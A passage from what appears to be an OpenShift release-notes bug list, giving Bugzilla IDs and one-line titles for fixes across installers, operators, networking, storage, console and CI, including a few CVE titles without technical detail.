2048067 - [IPI on Alibabacloud] "Platform Provisioning Check" tells '"ap-southeast-6": enhanced NAT gateway is not supported', which seems false
2048186 - Image registry operator panics when finalizes config deletion
2048214 - Can not push images to image-registry when enabling KMS encryption in AlibabaCloud
2048219 - MetalLB: User should not be allowed add same bgp advertisement twice in BGP address pool
2048221 - Capitalization of titles in the VM details page is inconsistent.
2048222 - [AWS GovCloud] Cluster can not be installed on AWS GovCloud regions via terminal interactive UI.
2048276 - Cypress E2E tests fail due to a typo in test-cypress.sh
2048333 - prometheus-adapter becomes inaccessible during rollout
2048352 - [OVN] node does not recover after NetworkManager restart, NotReady and unreachable
2048442 - [KMS] UI does not have option to specify kube auth path and namespace for cluster wide encryption
2048451 - Custom serviceEndpoints in install-config are reported to be unreachable when environment uses a proxy
2048538 - Network policies are not implemented or updated by OVN-Kubernetes
2048541 - incorrect rbac check for install operator quick starts
2048563 - Leader election conventions for cluster topology
2048575 - IP reconciler cron job failing on single node
2048686 - Check MAC address provided on the install-config.yaml file
2048687 - All bare metal jobs are failing now due to End of Life of centos 8
2048793 - Many Conformance tests are failing in OCP 4.10 with Kuryr
2048803 - CRI-O seccomp profile out of date
2048824 - [IBMCloud] ibm-vpc-block-csi-node does not specify an update strategy, only resource requests, or priority class
2048841 - [ovn] Missing lr-policy-list and snat rules for egressip when new pods are added
2048955 - Alibaba Disk CSI Driver does not have CI
2049073 - AWS EFS CSI driver should use the trusted CA bundle when cluster proxy is configured
2049078 - Bond CNI: Failed to attach Bond NAD to pod
2049108 - openshift-installer intermittent failure on AWS with 'Error: Error waiting for NAT Gateway (nat-xxxxx) to become available'
2049117 - e2e-metal-ipi-serial-ovn-ipv6 is failing frequently
2049133 - oc adm catalog mirror throws 'missing signature key' error when using file://local/index
2049142 - Missing "app" label
2049169 - oVirt CSI driver should use the trusted CA bundle when cluster proxy is configured
2049234 - ImagePull fails with error "unable to pull manifest from example.com/busy.box:v5 invalid reference format"
2049410 - external-dns-operator creates provider section, even when not requested
2049483 - Sidepanel for Connectors/workloads in topology shows invalid tabs
2049613 - MTU migration on SDN IPv4 causes API alerts
2049671 - system:serviceaccount:openshift-cluster-csi-drivers:aws-ebs-csi-driver-operator trying to GET and DELETE /api/v1/namespaces/openshift-cluster-csi-drivers/configmaps/kube-cloud-config which does not exist
2049687 - superfluous apirequestcount entries in audit log
2049775 - cloud-provider-config change not applied when ExternalCloudProvider enabled
2049787 - (dummy bug) ovn-kubernetes ExternalTrafficPolicy still SNATs
2049832 - ContainerCreateError when trying to launch large (>500) numbers of pods across nodes
2049872 - cluster storage operator AWS credentialsrequest lacks KMS privileges
2049889 - oc new-app --search nodejs warns about access to sample content on quay.io
2050005 - Plugin module IDs can clash with console module IDs causing runtime errors
2050011 - Observe > Metrics page: Timespan text input and dropdown do not align
2050120 - Missing metrics in kube-state-metrics
2050146 - Installation on PSI fails with: 'openstack platform does not have the required standard-attr-tag network extension'
2050173 - [aws-ebs-csi-driver] Merge upstream changes since v1.2.0
2050180 - [aws-efs-csi-driver] Merge upstream changes since v1.3.2
2050300 - panic in cluster-storage-operator while updating status
2050332 - Malformed ClusterClaim lifetimes cause the clusterclaims-controller to silently fail to reconcile all clusterclaims
2050335 - azure-disk failed to mount with error special device does not exist
2050345 - alert data for burn budget needs to be updated to prevent regression
2050407 - revert "force cert rotation every couple days for development" in 4.11
2050409 - ip-reconcile job is failing consistently
2050452 - Update osType and hardware version used by RHCOS OVA to indicate it is a RHEL 8 guest
2050466 - machine config update with invalid container runtime config should be more robust
2050637 - Blog Link not re-directing to the intented website in the last modal in the Dev Console Onboarding Tour
2050698 - After upgrading the cluster the console still show 0 of N, 0% progress for worker nodes
2050707 - up test for prometheus pod look to far in the past
2050767 - Vsphere upi tries to access vsphere during manifests generation phase
2050853 - CVE-2021-23566 nanoid: Information disclosure via valueOf() function
2050882 - Crio appears to be coredumping in some scenarios
2050902 - not all resources created during import have common labels
2050946 - Cluster-version operator fails to notice TechPreviewNoUpgrade featureSet change after initialization-lookup error
2051320 - Need to build ose-aws-efs-csi-driver-operator-bundle-container image for 4.11
2051333 - [aws] records in public hosted zone and BYO private hosted zone were not deleted.
2051377 - Unable to switch vfio-pci to netdevice in policy
2051378 - Template wizard is crashed when there are no templates existing
2051423 - migrate loadbalancers from amphora to ovn not working
2051457 - [RFE] PDB for cloud-controller-manager to avoid going too many replicas down
2051470 - prometheus: Add validations for relabel configs
2051558 - RoleBinding in project without subject is causing "Project access" page to fail
2051578 - Sort is broken for the Status and Version columns on the Cluster Settings > ClusterOperators page
2051583 - sriov must-gather image doesn't work
2051593 - Summary Interval Hardcoded in PTP Operator if Set in the Global Body Instead of Command Line
2051611 - Remove Check which enforces summary_interval must match logSyncInterval
2051642 - Remove "Tech-Preview" Label for the Web Terminal GA release
2051657 - Remove 'Tech preview' from minnimal deployment Storage System creation
2051718 - MetaLLB: Validation Webhook: BGPPeer hold time is allowed to be set to less than 3s
2051722 - MetalLB: BGPPeer object does not have ability to set ebgpMultiHop
2051881 - [vSphere CSI driver Operator] RWX volumes counts metrics vsphere_rwx_volumes_total not valid
2051954 - Allow changing of policyAuditConfig ratelimit post-deployment
2051969 - Need to build local-storage-operator-metadata-container image for 4.11
2051985 - An APIRequestCount without dots in the name can cause a panic
2052016 - MetalLB: Webhook Validation: Two BGPPeers instances can have different router ID set.
2052034 - Can't start correct debug pod using pod definition yaml in OCP 4.8
2052055 - Whereabouts should implement client-go 1.22+
2052056 - Static pod installer should throttle creating new revisions
2052071 - local storage operator metrics target down after upgrade
2052095 - Infinite OAuth redirect loop post-upgrade to 4.10.0-rc.1
2052270 - FSyncControllerDegraded has "treshold" -> "threshold" typos
2052309 - [IBM Cloud] ibm-vpc-block-csi-controller does not specify an update strategy, priority class, or only resource requests
2052332 - Probe failures and pod restarts during 4.7 to 4.8 upgrade
2052393 - Failed to scaleup RHEL machine against OVN cluster due to jq tool is required by configure-ovs.sh
2052398 - 4.9 to 4.10 upgrade fails for ovnkube-masters
2052415 - Pod density test causing problems when using kube-burner
2052513 - Failing webhooks will block an upgrade to 4.10 mid-way through the upgrade.
2052578 - Create new app from a private git repository using 'oc new app' with basic auth does not work.
2052595 - Remove dev preview badge from IBM FlashSystem deployment windows
2052618 - Node reboot causes duplicate persistent volumes
2052671 - Add Sprint 214 translations
2052674 - Remove extra spaces
2052700 - kube-controller-manger should use configmap lease
2052701 - kube-scheduler should use configmap lease
2052814 - go fmt fails in OSM after migration to go 1.17
2052840 - IMAGE_BUILDER=docker make test-e2e-operator-ocp runs with podman instead of docker
2052953 - Observe dashboard always opens for last viewed workload instead of the selected one
2052956 - Installing virtualization operator duplicates the first action on workloads in topology
2052975 - High cpu load on Juniper Qfx5120 Network switches after upgrade to Openshift 4.8.26
2052986 - Console crashes when Mid cycle hook in Recreate strategy(edit deployment/deploymentConfig) selects Lifecycle strategy as "Tags the current image as an image stream tag if the deployment succeeds"
2053006 - [ibm]Operator storage PROGRESSING and DEGRADED is true during fresh install for ocp4.11
2053104 - [vSphere CSI driver Operator] hw_version_total metric update wrong value after upgrade nodes hardware version from vmx-13 to vmx-15
2053112 - nncp status is unknown when nnce is Progressing
2053118 - nncp Available condition reason should be exposed in oc get
2053168 - Ensure the core dynamic plugin SDK package has correct types and code
2053205 - ci-openshift-cluster-network-operator-master-e2e-agnostic-upgrade is failing most of the time
2053304 - Debug terminal no longer works in admin console
2053312 - requestheader IDP test doesn't wait for cleanup, causing high failure rates
2053334 - rhel worker scaleup playbook failed because missing some dependency of podman
2053343 - Cluster Autoscaler not scaling down nodes which seem to qualify for scale-down
2053491 - nmstate interprets interface names as float64 and subsequently crashes on state update
2053501 - Git import detection does not happen for private repositories
2053582 - inability to detect static lifecycle failure
2053596 - [IBM Cloud] Storage IOPS limitations and lack of IPI ETCD deployment options trigger leader election during cluster initialization
2053609 - LoadBalancer SCTP service leaves stale conntrack entry that causes issues if service is recreated
2053622 - PDB warning alert when CR replica count is set to zero
2053685 - Topology performance: Immutable .toJSON consumes a lot of CPU time when rendering a large topology graph (~100 nodes)
2053721 - When using RootDeviceHint rotational setting the host can fail to provision
2053922 - [OCP 4.8][OVN] pod interface: error while waiting on OVS.Interface.external-ids
2054095 - [release-4.11] Gather images.conifg.openshift.io cluster resource definiition
2054197 - The ProjectHelmChartRepositrory schema has merged but has not been initialized in the cluster yet
2054200 - Custom created services in openshift-ingress removed even though the services are not of type LoadBalancer
2054238 - console-master-e2e-gcp-console is broken
2054254 - vSphere test failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial]
2054285 - Services other than knative service also shows as KSVC in add subscription/trigger modal
2054319 - must-gather | gather_metallb_logs can't detect metallb pod
2054351 - Rrestart of ptp4l/phc2sys on change of PTPConfig generates more than one times, socket error in event frame work
2054385 - redhat-operatori ndex image build failed with AMQ brew build - amq-interconnect-operator-metadata-container-1.10.13
2054564 - DPU network operator 4.10 branch need to sync with master
2054630 - cancel create silence from kebab menu of alerts page will navigated to the previous page
2054693 - Error deploying HorizontalPodAutoscaler with oc new-app command in OpenShift 4
2054701 - [MAPO] Events are not created for MAPO machines
2054705 - [tracker] nf_reinject calls nf_queue_entry_free on an already freed entry->state
2054735 - Bad link in CNV console
2054770 - IPI baremetal deployment metal3 pod crashes when using capital letters in hosts bootMACAddress
2054787 - SRO controller goes to CrashLoopBackOff status when the pull-secret does not have the correct permissions
2054950 - A large number is showing on disk size field
2055305 - Thanos Querier high CPU and memory usage till OOM
2055386 - MetalLB changes the shared external IP of a service upon updating the externalTrafficPolicy definition
2055433 - Unable to create br-ex as gateway is not found
2055470 - Ingresscontroller LB scope change behaviour differs for different values of aws-load-balancer-internal annotation
2055492 - The default YAML on vm wizard is not latest
2055601 - installer did not destroy .app dns recored in a IPI on ASH install
2055702 - Enable Serverless tests in CI
2055723 - CCM operator doesn't deploy resources after enabling TechPreviewNoUpgrade feature set.
2055729 - NodePerfCheck fires and stays active on momentary high latency
2055814 - Custom dynamic exntension point causes runtime and compile time error
2055861 - cronjob collect-profiles failed leads node reach to OutOfpods status
2055980 - [dynamic SDK][internal] console plugin SDK does not support table actions
2056454 - Implement preallocated disks for oVirt in the cluster API provider
2056460 - Implement preallocated disks for oVirt in the OCP installer
2056496 - If image does not exists for builder image then upload jar form crashes
2056519 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies
2056607 - Running kubernetes-nmstate handler e2e tests stuck on OVN clusters
2056752 - Better to named the oc-mirror version info with more information like the oc version --client
2056802 - "enforcedLabelLimit|enforcedLabelNameLengthLimit|enforcedLabelValueLengthLimit" do not take effect
2056841 - [UI] [DR] Web console update is available pop-up is seen multiple times on Hub cluster where ODF operator is not installed and unnecessarily it pop-up on the Managed cluster as well where ODF operator is installed
2056893 - incorrect warning for --to-image in oc adm upgrade help
2056967 - MetalLB: speaker metrics is not updated when deleting a service
2057025 - Resource requests for the init-config-reloader container of prometheus-k8s- pods are too high
2057054 - SDK: k8s methods resolves into Response instead of the Resource
2057079 - [cluster-csi-snapshot-controller-operator] CI failure: events should not repeat pathologically
2057101 - oc commands working with images print an incorrect and inappropriate warning
2057160 - configure-ovs selects wrong interface on reboot
2057183 - OperatorHub: Missing "valid subscriptions" filter
2057251 - response code for Pod count graph changed from 422 to 200 periodically for about 30 minutes if pod is rescheduled
2057358 - [Secondary Scheduler] - cannot build bundle index image using the secondary scheduler operator bundle
2057387 - [Secondary Scheduler] - olm.skiprange, com.redhat.openshift.versions is incorrect and no minkubeversion
2057403 - CMO logs show forbidden: User "system:serviceaccount:openshift-monitoring:cluster-monitoring-operator" cannot get resource "replicasets" in API group "apps" in the namespace "openshift-monitoring"
2057495 - Alibaba Disk CSI driver does not provision small PVCs
2057558 - Marketplace operator polls too frequently for cluster operator status changes
2057633 - oc rsync reports misleading error when container is not found
2057642 - ClusterOperator status.conditions[].reason "etcd disk metrics exceeded..." should be a CamelCase slug
2057644 - FSyncControllerDegraded latches True, even after fsync latency recovers on all members
2057696 - Removing console still blocks OCP install from completing
2057762 - ingress operator should report Upgradeable False to remind user before upgrade to 4.10 when Non-SAN certs are used
2057832 - expr for record rule: "cluster:telemetry_selected_series:count" is improper
2057967 - KubeJobCompletion does not account for possible job states
2057990 - Add extra debug information to image signature workflow test
2057994 - SRIOV-CNI failed to load netconf: LoadConf(): failed to get VF information
2058030 - On OCP 4.10+ using OVNK8s on BM IPI, nodes register as localhost.localdomain
2058217 - [vsphere-problem-detector-operator] 'vsphere_rwx_volumes_total' metric name make confused
2058225 - openshift_csi_share_ metrics are not found from telemeter server
2058282 - Websockets stop updating during cluster upgrades
2058291 - CI builds should have correct version of Kube without needing to push tags everytime
2058368 - Openshift OVN-K got restarted mutilple times with the error " ovsdb-server/memory-trim-on-compaction on'' failed: exit status 1 and " ovndbchecker.go:118] unable to turn on memory trimming for SB DB, stderr " , cluster unavailable
2058370 - e2e-aws-driver-toolkit CI job is failing
2058421 - 4.9.23-s390x-machine-os-content manifest invalid when mirroring content for disconnected install
2058424 - ConsolePlugin proxy always passes Authorization header even if authorize property is omitted or false
2058623 - Bootstrap server dropdown menu in Create Event Source- KafkaSource form is empty even if it's created
2058626 - Multiple Azure upstream kube fsgroupchangepolicy tests are permafailing expecting gid "1000" but geting "root"
2058671 - whereabouts IPAM CNI ip-reconciler cronjob specification requires hostnetwork, api-int lb usage & proper backoff
2058692 - [Secondary Scheduler] Creating secondaryscheduler instance fails with error "key failed with : secondaryschedulers.operator.openshift.io "secondary-scheduler" not found"
2059187 - [Secondary Scheduler] - key failed with : serviceaccounts "secondary-scheduler" is forbidden
2059212 - [tracker] Backport https://github.com/util-linux/util-linux/commit/eab90ef8d4f66394285e0cff1dfc0a27242c05aa
2059213 - ART cannot build installer images due to missing terraform binaries for some architectures
2059338 - A fully upgraded 4.10 cluster defaults to HW-13 hardware version even if HW-15 is default (and supported)
2059490 - The operator image in CSV file of the ART DPU network operator bundle is incorrect
2059567 - vMedia based IPI installation of OpenShift fails on Nokia servers due to issues with virtual media attachment and boot source override
2059586 - (release-4.11) Insights operator doesn't reconcile clusteroperator status condition messages
2059654 - Dynamic demo plugin proxy example out of date
2059674 - Demo plugin fails to build
2059716 - cloud-controller-manager flaps operator version during 4.9 -> 4.10 update
2059791 - [vSphere CSI driver Operator] didn't update 'vsphere_csi_driver_error' metric value when fixed the error manually
2059840 - [LSO]Could not gather logs for pod diskmaker-discovery and diskmaker-manager
2059943 - MetalLB: Move CI config files to metallb repo from dev-scripts repo
2060037 - Configure logging level of FRR containers
2060083 - CMO doesn't react to changes in clusteroperator console
2060091 - CMO produces invalid alertmanager statefulset if console cluster .status.consoleURL is unset
2060133 - [OVN RHEL upgrade] could not find IP addresses: failed to lookup link br-ex: Link not found
2060147 - RHEL8 Workers Need to Ensure libseccomp is up to date at install time
2060159 - LGW: External->Service of type ETP=Cluster doesn't go to the node
2060329 - Detect unsupported amount of workloads before rendering a lazy or crashing topology
2060334 - Azure VNET lookup fails when the NIC subnet is in a different resource group
2060361 - Unable to enumerate NICs due to missing the 'primary' field due to security restrictions
2060406 - Test 'operators should not create watch channels very often' fails
2060492 - Update PtpConfigSlave source-crs to use network_transport L2 instead of UDPv4
2060509 - Incorrect installation of ibmcloud vpc csi driver in IBM Cloud ROKS 4.10
2060532 - LSO e2e tests are run against default image and namespace
2060534 - openshift-apiserver pod in crashloop due to unable to reach kubernetes svc ip
2060549 - ErrorAddingLogicalPort: duplicate IP found in ECMP Pod route cache!
2060553 - service domain can't be resolved when networkpolicy is used in OCP 4.10-rc
2060583 - Remove Console internal-kubevirt plugin SDK package
2060605 - Broken access to public images: Unable to connect to the server: no basic auth credentials
2060617 - IBMCloud destroy DNS regex not strict enough
2060687 - Azure Ci: SubscriptionDoesNotSupportZone - does not support availability zones at location 'westus'
2060697 - [AWS] partitionNumber cannot work for specifying Partition number
2060714 - [DOCS] Change source_labels to sourceLabels in "Configuring remote write storage" section
2060837 - [oc-mirror] Catalog merging error when two or more bundles does not have a set Replace field
2060894 - Preceding/Trailing Whitespaces In Form Elements on the add page
2060924 - Console white-screens while using debug terminal
2060968 - Installation failing due to ironic-agent.service not starting properly
2060970 - Bump recommended FCOS to 35.20220213.3.0
2061002 - Conntrack entry is not removed for LoadBalancer IP
2061301 - Traffic Splitting Dialog is Confusing With Only One Revision
2061303 - Cachito request failure with vendor directory is out of sync with go.mod/go.sum
2061304 - workload info gatherer - don't serialize empty images map
2061333 - White screen for Pipeline builder page
2061447 - [GSS] local pv's are in terminating state
2061496 - etcd RecentBackup=Unknown ControllerStarted contains no message string
2061527 - [IBMCloud] infrastructure asset missing CloudProviderType
2061544 - AzureStack is hard-coded to use Standard_LRS for the disk type
2061549 - AzureStack install with internal publishing does not create api DNS record
2061611 - [upstream] The marker of KubeBuilder doesn't work if it is close to the code
2061732 - Cinder CSI crashes when API is not available
2061755 - Missing breadcrumb on the resource creation page
2061833 - A single worker can be assigned to multiple baremetal hosts
2061891 - [IPI on IBMCLOUD] missing ?br-sao? region in openshift installer
2061916 - mixed ingress and egress policies can result in half-isolated pods
2061918 - Topology Sidepanel style is broken
2061919 - Egress Ip entry stays on node's primary NIC post deletion from hostsubnet
2062007 - MCC bootstrap command lacks template flag
2062126 - IPfailover pod is crashing during creation showing keepalived_script doesn't exist
2062151 - Add RBAC for 'infrastructures' to operator bundle
2062355 - kubernetes-nmstate resources and logs not included in must-gathers
2062459 - Ingress pods scheduled on the same node
2062524 - [Kamelet Sink] Topology crashes on click of Event sink node if the resource is created source to Uri over ref
2062558 - Egress IP with openshift sdn in not functional on worker node.
2062568 - CVO does not trigger new upgrade again after fail to update to unavailable payload
2062645 - configure-ovs: don't restart networking if not necessary
2062713 - Special Resource Operator(SRO) - No sro_used_nodes metric
2062849 - hw event proxy is not binding on ipv6 local address
2062920 - Project selector is too tall with only a few projects
2062998 - AWS GovCloud regions are recognized as the unknown regions
2063047 - Configuring a full-path query log file in CMO breaks Prometheus with the latest version of the operator
2063115 - ose-aws-efs-csi-driver has invalid dependency in go.mod
2063164 - metal-ipi-ovn-ipv6 Job Permafailing and Blocking OpenShift 4.11 Payloads: insights operator is not available
2063183 - DefragDialTimeout is set to low for large scale OpenShift Container Platform - Cluster
2063194 - cluster-autoscaler-default will fail when automated etcd defrag is running on large scale OpenShift Container Platform 4 - Cluster
2063321 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs
2063324 - MCO template output directories created with wrong mode causing render failure in unprivileged container environments
2063375 - ptp operator upgrade from 4.9 to 4.10 stuck at pending due to service account requirements not met
2063414 - on OKD 4.10, when image-registry is enabled, the /etc/hosts entry is missing on some nodes
2063699 - Builds - Builds - Logs: i18n misses.
2063708 - Builds - Builds - Logs: translation correction needed.
2063720 - Metallb EBGP neighbor stuck in active until adding ebgp-multihop (directly connected neighbors)
2063732 - Workloads - StatefulSets : I18n misses
2063747 - When building a bundle, the push command fails because is passes a redundant "IMG=" on the the CLI
2063753 - User Preferences - Language - Language selection : Page refresh rquired to change the UI into selected Language.
2063756 - User Preferences - Applications - Insecure traffic : i18n misses
2063795 - Remove go-ovirt-client go.mod replace directive
2063829 - During an IPI install with the 4.10.4 installer on vSphere, getting "Check": platform.vsphere.network: Invalid value: "VLAN_3912": unable to find network provided"
2063831 - etcd quorum pods landing on same node
2063897 - Community tasks not shown in pipeline builder page
2063905 - PrometheusOperatorWatchErrors alert may fire shortly in case of transient errors from the API server
2063938 - sing the hard coded rest-mapper in library-go
2063955 - cannot download operator catalogs due to missing images
2063957 - User Management - Users : While Impersonating user, UI is not switching into user's set language
2064024 - SNO OCP upgrade with DU workload stuck at waiting for kube-apiserver static pod
2064170 - [Azure] Missing punctuation in the installconfig.controlPlane.platform.azure.osDisk explain
2064239 - Virtualization Overview page turns into blank page
2064256 - The Knative traffic distribution doesn't update percentage in sidebar
2064553 - UI should prefer to use the virtio-win configmap than v2v-vmware configmap for windows creation
2064596 - Fix the hubUrl docs link in pipeline quicksearch modal
2064607 - Pipeline builder makes too many (100+) API calls upfront
2064613 - [OCPonRHV]- after few days that cluster is alive we got error in storage operator
2064693 - [IPI][OSP] Openshift-install fails to find the shiftstack cloud defined in clouds.yaml in the current directory
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server
2064705 - the alertmanagerconfig validation catches the wrong value for invalid field
2064744 - Errors trying to use the Debug Container feature
2064984 - Update error message for label limits
2065076 - Access monitoring Routes based on monitoring-shared-config creates wrong URL
2065160 - Possible leak of load balancer targets on AWS Machine API Provider
2065224 - Configuration for cloudFront in image-registry operator configuration is ignored & duration is corrupted
2065290 - CVE-2021-23648 sanitize-url: XSS
2065338 - VolumeSnapshot creation date sorting is broken
2065507 - oc adm upgrade should return ReleaseAccepted condition to show upgrade status.
2065510 - [AWS] failed to create cluster on ap-southeast-3
2065513 - Dev Perspective -> Project Dashboard shows Resource Quotas which are a bit misleading, and too many decimal places
2065547 - (release-4.11) Gather kube-controller-manager pod logs with garbage collector errors
2065552 - [AWS] Failed to install cluster on AWS ap-southeast-3 region due to image-registry panic error
2065577 - user with user-workload-monitoring-config-edit role can not create user-workload-monitoring-config configmap
2065597 - Cinder CSI is not configurable
2065682 - Remote write relabel config adds label __tmp_openshift_cluster_id to all metrics
2065689 - Internal Image registry with GCS backend does not redirect client
2065749 - Kubelet slowly leaking memory and pods eventually unable to start
2065785 - ip-reconciler job does not complete, halts node drain
2065804 - Console backend check for Web Terminal Operator incorrectly returns HTTP 204
2065806 - stop considering Mint mode as supported on Azure
2065840 - the cronjob object is created with a wrong api version batch/v1beta1 when created via the openshift console
2065893 - [4.11] Bootimage bump tracker
2066009 - CVE-2021-44906 minimist: prototype pollution
2066232 - e2e-aws-workers-rhel8 is failing on ansible check
2066418 - [4.11] Update channels information link is taking to a 404 error page
2066444 - The "ingress" clusteroperator's relatedObjects field has kind names instead of resource names
2066457 - Prometheus CI failure: 503 Service Unavailable
2066463 - [IBMCloud] failed to list DNS zones: Exactly one of ApiKey or RefreshToken must be specified
2066605 - coredns template block matches cluster API to loose
2066615 - Downstream OSDK still use upstream image for Hybird type operator
2066619 - The GitCommit of the oc-mirror version is not correct
2066665 - [ibm-vpc-block] Unable to change default storage class
2066700 - [node-tuning-operator] - Minimize wildcard/privilege Usage in Cluster and Local Roles
2066754 - Cypress reports for core tests are not captured
2066782 - Attached disk keeps in loading status when add disk to a power off VM by non-privileged user
2066865 - Flaky test: In-tree Volumes [Driver: azure-disk] [Testpattern: Dynamic PV (delayed binding)] topology should provision a volume and schedule a pod with AllowedTopologies
2066886 - openshift-apiserver pods never going NotReady
2066887 - Dependabot alert: Path traversal in github.com/valyala/fasthttp
2066889 - Dependabot alert: Path traversal in github.com/valyala/fasthttp
2066923 - No rule to make target 'docker-push' when building the SRO bundle
2066945 - SRO appends "arm64" instead of "aarch64" to the kernel name and it doesn't match the DTK
2067004 - CMO contains grafana image though grafana is removed
2067005 - Prometheus rule contains grafana though grafana is removed
2067062 - should update prometheus-operator resources version
2067064 - RoleBinding in Developer Console is dropping all subjects when editing
2067155 - Incorrect operator display name shown in pipelines quickstart in devconsole
2067180 - Missing i18n translations
2067298 - Console 4.10 operand form refresh
2067312 - PPT event source is lost when received by the consumer
2067384 - OCP 4.10 should be firing APIRemovedInNextEUSReleaseInUse for APIs removed in 1.25
2067456 - OCP 4.11 should be firing APIRemovedInNextEUSReleaseInUse and APIRemovedInNextReleaseInUse for APIs removed in 1.25
2067995 - Internal registries with a big number of images delay pod creation due to recursive SELinux file context relabeling
2068115 - resource tab extension fails to show up
2068148 - [4.11] /etc/redhat-release symlink is broken
2068180 - OCP UPI on AWS with STS enabled is breaking the Ingress operator
2068181 - Event source powered with kamelet type source doesn't show associated deployment in resources tab
2068490 - OLM descriptors integration test failing
2068538 - Crashloop back-off popover visual spacing defects
2068601 - Potential etcd inconsistent revision and data occurs
2068613 - ClusterRoleUpdated/ClusterRoleBindingUpdated Spamming Event Logs
2068908 - Manual blog link change needed
2069068 - reconciling Prometheus Operator Deployment failed while upgrading from 4.7.46 to 4.8.35
2069075 - [Alibaba 4.11.0-0.nightly] cluster storage component in Progressing state
2069181 - Disabling community tasks is not working
2069198 - Flaky CI test in e2e/pipeline-ci
2069307 - oc mirror hangs when processing the Red Hat 4.10 catalog
2069312 - extend rest mappings with 'job' definition
2069457 - Ingress operator has superfluous finalizer deletion logic for LoadBalancer-type services
2069577 - ConsolePlugin example proxy authorize is wrong
2069612 - Special Resource Operator (SRO) - Crash when nodeSelector does not match any nodes
2069632 - Not able to download previous container logs from console
2069643 - ConfigMaps leftovers while uninstalling SpecialResource with configmap
2069654 - Creating VMs with YAML on Openshift Virtualization UI is missing labels flavor, os and workload
2069685 - UI crashes on load if a pinned resource model does not exist
2069705 - prometheus target "serviceMonitor/openshift-metallb-system/monitor-metallb-controller/0" has a failure with "server returned HTTP status 502 Bad Gateway"
2069740 - On-prem loadbalancer ports conflict with kube node port range
2069760 - In developer perspective divider does not show up in navigation
2069904 - Sync upstream 1.18.1 downstream
2069914 - Application Launcher groupings are not case-sensitive
2069997 - [4.11] should add user containers in /etc/subuid and /etc/subgid to support run pods in user namespaces
2070000 - Add warning alerts for installing standalone k8s-nmstate
2070020 - InContext doesn't work for Event Sources
2070047 - Kuryr: Prometheus when installed on the cluster shouldn't report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured
2070160 - Copy-to-clipboard and
elements cause display issues for ACM dynamic plugins 2070172 - SRO uses the chart's name as Helm release, not the SpecialResource's 2070181 - [MAPO] serverGroupName ignored 2070457 - Image vulnerability Popover overflows from the visible area 2070674 - [GCP] Routes get timed out and nonresponsive after creating 2K service routes 2070703 - some ipv6 network policy tests consistently failing 2070720 - [UI] Filter reset doesn't work on Pods/Secrets/etc pages and complete list disappears 2070731 - details switch label is not clickable on add page 2070791 - [GCP]Image registry are crash on cluster with GCP workload identity enabled 2070792 - service "openshift-marketplace/marketplace-operator-metrics" is not annotated with capability 2070805 - ClusterVersion: could not download the update 2070854 - cv.status.capabilities.enabledCapabilities doesn?t show the day-2 enabled caps when there are errors on resources update 2070887 - Cv condition ImplicitlyEnabledCapabilities doesn?t complain about the disabled capabilities which is previously enabled 2070888 - Cannot bind driver vfio-pci when apply sriovnodenetworkpolicy with type vfio-pci 2070929 - OVN-Kubernetes: EgressIP breaks access from a pod with EgressIP to other host networked pods on different nodes 2071019 - rebase vsphere csi driver 2.5 2071021 - vsphere driver has snapshot support missing 2071033 - conditionally relabel volumes given annotation not working - SELinux context match is wrong 2071139 - Ingress pods scheduled on the same node 2071364 - All image building tests are broken with " error: build error: attempting to convert BUILD_LOGLEVEL env var value "" to integer: strconv.Atoi: parsing "": invalid syntax 2071578 - Monitoring navigation should not be shown if monitoring is not available (CRC) 2071599 - RoleBidings are not getting updated for ClusterRole in OpenShift Web Console 2071614 - Updating EgressNetworkPolicy rejecting with error UnsupportedMediaType 2071617 - remove Kubevirt extensions in favour of dynamic plugin 2071650 - ovn-k ovn_db_cluster metrics are not exposed for SNO 2071691 - OCP Console global PatternFly overrides adds padding to breadcrumbs 2071700 - v1 events show "Generated from" message without the source/reporting component 2071715 - Shows 404 on Environment nav in Developer console 2071719 - OCP Console global PatternFly overrides link button whitespace 2071747 - Link to documentation from the overview page goes to a missing link 2071761 - Translation Keys Are Not Namespaced 2071799 - Multus CNI should exit cleanly on CNI DEL when the API server is unavailable 2071859 - ovn-kube pods spec.dnsPolicy should be Default 2071914 - cloud-network-config-controller 4.10.5: Error building cloud provider client, err: %vfailed to initialize Azure environment: autorest/azure: There is no cloud environment matching the name "" 2071998 - Cluster-version operator should share details of signature verification when it fails in 'Force: true' updates 2072106 - cluster-ingress-operator tests do not build on go 1.18 2072134 - Routes are not accessible within cluster from hostnet pods 2072139 - vsphere driver has permissions to create/update PV objects 2072154 - Secondary Scheduler operator panics 2072171 - Test "[sig-network][Feature:EgressFirewall] EgressFirewall should have no impact outside its namespace [Suite:openshift/conformance/parallel]" fails 2072195 - machine api doesn't issue client cert when AWS DNS suffix missing 2072215 - Whereabouts ip-reconciler should be opt-in and not required 2072389 - CVO exits upgrade immediately rather than waiting for etcd backup 2072439 - openshift-cloud-network-config-controller reports wrong range of IP addresses for Azure worker nodes 2072455 - make bundle overwrites supported-nic-ids_v1_configmap.yaml 2072570 - The namespace titles for operator-install-single-namespace test keep changing 2072710 - Perfscale - pods time out waiting for OVS port binding (ovn-installed) 2072766 - Cluster Network Operator stuck in CrashLoopBackOff when scheduled to same master 2072780 - OVN kube-master does not clear NetworkUnavailableCondition on GCP BYOH Windows node 2072793 - Drop "Used Filesystem" from "Virtualization -> Overview" 2072805 - Observe > Dashboards: $__range variables cause PromQL query errors 2072807 - Observe > Dashboards: Missingpanel.stylesattribute for table panels causes JS error 2072842 - (release-4.11) Gather namespace names with overlapping UID ranges 2072883 - sometimes monitoring dashboards charts can not be loaded successfully 2072891 - Update gcp-pd-csi-driver to 1.5.1; 2072911 - panic observed in kubedescheduler operator 2072924 - periodic-ci-openshift-release-master-ci-4.11-e2e-azure-techpreview-serial 2072957 - ContainerCreateError loop leads to several thousand empty logfiles in the file system 2072998 - update aws-efs-csi-driver to the latest version 2072999 - Navigate from logs of selected Tekton task instead of last one 2073021 - [vsphere] Failed to update OS on master nodes 2073112 - Prometheus (uwm) externalLabels not showing always in alerts. 2073113 - Warning is logged to the console: W0407 Defaulting of registry auth file to "${HOME}/.docker/config.json" is deprecated. 2073176 - removing data in form does not remove data from yaml editor 2073197 - Error in Spoke/SNO agent: Source image rejected: A signature was required, but no signature exists 2073329 - Pipelines-plugin- Having different title for Pipeline Runs tab, on Pipeline Details page it's 